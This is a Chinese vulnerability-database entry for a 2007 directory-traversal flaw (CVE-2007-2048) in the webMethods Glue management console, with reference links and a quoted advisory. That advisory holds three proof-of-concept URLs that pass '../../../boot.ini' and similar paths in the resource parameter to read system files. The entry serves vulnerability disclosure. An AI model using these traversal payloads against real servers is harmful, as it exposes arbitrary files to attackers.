webMethods Glue 'Console'目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112680 漏洞类型 路径遍历
发布时间 2007-04-11 更新时间 2007-05-07
CVE编号 CVE-2007-2048 CNNVD-ID CNNVD-200704-260
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/29843
https://www.securityfocus.com/bid/23423
https://cxsecurity.com/issue/WLB-2007040096
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-260
|漏洞详情
webMethodsGlue的管理控制台中的/console存在目录遍历漏洞。远程攻击者可以借助资源参数中的..,读取任意的系统文件。
|漏洞EXP
source: http://www.securityfocus.com/bid/23423/info

webMethods Glue is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable computer with the privileges of the affected application. Information obtained may aid in further attacks.

This issue affects webMethods Glue 6.5.1; other versions may also be vulnerable. 

http://www.example.com:8080/console?resource=../../../boot.ini
http://www.example.com:8080/console?resource=\boot.ini
http://www.example.com:8080/console?resource=c:\boot.ini
|受影响的产品
webMethods webMethods Glue 6.5.1 webMethods webMethods Glue 5.0 webMethods webMethods Glue 4.0 webMethods webMethods Glue
|参考资料

来源:VUPEN
名称:ADV-2007-1363
链接:http://www.frsirt.com/english/advisories/2007/1363
来源:BID
名称:23423
链接:http://www.securityfocus.com/bid/23423
来源:BUGTRAQ
名称:20070507Updated:webMethodsSecurityAdvisory:Glueconsoledirectorytraversalvulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/467873/30/6720/threaded
来源:BUGTRAQ
名称:20070411webMethodsGlueManagementConsoleDirectoryTraversal
链接:http://www.securityfocus.com/archive/1/archive/1/465332/100/0/threaded
来源:MISC
名称:http://www.aushack.com/advisories/200704-webmethods.txt
链接:http://www.aushack.com/advisories/200704-webmethods.txt
来源:SECTRACK
名称:1017926
链接:http://www.securitytracker.com/id?1017926
来源:BUGTRAQ
名称:20070417webMethodsSecurityAdvisory:Glueconsoledirectorytraversalvulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/465993/100/0/threaded
来源:SREASON
名称:2589
链接:http://securityreason.com/securityalert/2589
来源:SECUNIA
名称:24933
链接:http://secunia.com/advisories/24933